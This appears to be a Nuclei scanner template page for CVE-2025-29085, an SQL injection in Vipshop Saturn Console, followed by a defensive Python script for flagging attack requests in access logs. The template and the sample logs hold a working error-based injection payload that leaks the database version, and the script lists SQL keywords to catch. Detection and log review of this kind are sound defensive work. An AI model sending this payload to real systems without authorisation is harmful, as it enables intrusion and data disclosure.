Vipshop Saturn Console <= 3.5.1 - SQL Injection via ClusterKey Component
ID: CVE-2025-29085
Severity: critical
Author: iamnoooob,rootxharsh,pdresearch
Tags: cve,cve2025,vipshop,sqli
Description
SQL injection vulnerability in vipshop Saturn v.3.5.1 and before allows a remote attacker to execute arbitrary code via /console/dashboard/executorCount?zkClusterKey component.
YAML Source
id: CVE-2025-29085

info:
  name: Vipshop Saturn Console <= 3.5.1 - SQL Injection via ClusterKey Component
  author: iamnoooob,rootxharsh,pdresearch
  severity: critical
  description: |
    SQL injection vulnerability in vipshop Saturn v.3.5.1 and before allows a remote attacker to execute arbitrary code via /console/dashboard/executorCount?zkClusterKey component.
  reference:
    - https://github.com/advisories/GHSA-49v8-p6mm-3pfj
    - https://gist.github.com/Cafe-Tea/bcef0d7a2bdb5ec8e0d69de852fdc900
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2025-29085
    cwe-id: CWE-89
    epss-score: 0.00162
    epss-percentile: 0.33866
  metadata:
    verified: true
  tags: cve,cve2025,vipshop,sqli

http:
  - raw:
      - |
        GET /console/dashboard/executorCount?zkClusterKey=1%27-extractvalue(1,concat(0x0a,version()))--%20- HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: word
        part: body
        words:
          - "java.sql.SQLException: XPATH syntax error: '"

    extractors:
      - type: regex
        part: body
        internal: true
        name: version
        group: 1
        regex:
          - "XPATH syntax error: '\\\\n(.*?)'"

      - type: dsl
        dsl:
          - '"Database Version: " + version'
# digest: 4a0a00473045022100e5f99074229046de37679c305d0c65848581bd12c0e8749d558456412a9e734c022037abd8bbfc3c76bcee4902583c990a2403573a5caf5f3311fba343bed6c0a950:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities
This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2025/CVE-2025-29085.yaml"
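
For defenders reviewing web access logs, the following added example (not part of the template or the Saturn project) flags requests to the endpoint and parameter named above whose decoded zkClusterKey value carries SQL syntax or unexpected characters. The allowlist of legitimate key characters, the SQL keyword list, the non-target path and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Endpoint and parameter named in the advisory.
TARGET_PATH = "/console/dashboard/executorCount"
PARAM = "zkClusterKey"

# Assumption: legitimate cluster keys are short identifiers; adjust to your naming.
SAFE_KEY = re.compile(r"[A-Za-z0-9_.:/-]{1,128}")
# Assumption: quotes, comment markers and a few SQL keywords are never valid in a key.
SQL_HINTS = re.compile(r"'|\"|--|/\*|\b(extractvalue|updatexml|union|select|sleep)\b", re.I)
# Request line and status code inside a common/combined log format entry.
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+" (\d{3})')

def suspicious_requests(lines):
    """Return (client_ip, status, decoded_value, reason) for each flagged line."""
    hits = []
    for line in lines:
        m = REQUEST.search(line)
        if not m:
            continue
        url = urlsplit(m.group(1))
        if url.path != TARGET_PATH:
            continue
        # parse_qs percent-decodes values, so encoded quotes (%27) are seen as quotes.
        for value in parse_qs(url.query, keep_blank_values=True).get(PARAM, []):
            if SQL_HINTS.search(value):
                reason = "sql-syntax"
            elif not SAFE_KEY.fullmatch(value):
                reason = "unexpected-characters"
            else:
                continue
            hits.append((line.split()[0], int(m.group(2)), value, reason))
    return hits

# Constructed sample log lines (documentation IP ranges), not real traffic.
SAMPLE = [
    '192.0.2.10 - - [01/Apr/2025:10:00:00 +0000] "GET /console/dashboard/executorCount?zkClusterKey=cluster-a HTTP/1.1" 200 31',
    '198.51.100.7 - - [01/Apr/2025:10:00:05 +0000] "GET /console/dashboard/executorCount?zkClusterKey=1%27-extractvalue(1,concat(0x0a,version()))--%20- HTTP/1.1" 500 412',
    '198.51.100.7 - - [01/Apr/2025:10:00:09 +0000] "GET /console/dashboard/executorCount?zkClusterKey=a%3Bb HTTP/1.1" 200 31',
    '192.0.2.10 - - [01/Apr/2025:10:00:12 +0000] "GET /console/example-other?zkClusterKey=x%27 HTTP/1.1" 200 31',
]

if __name__ == "__main__":
    for hit in suspicious_requests(SAMPLE):
        print(hit)
```
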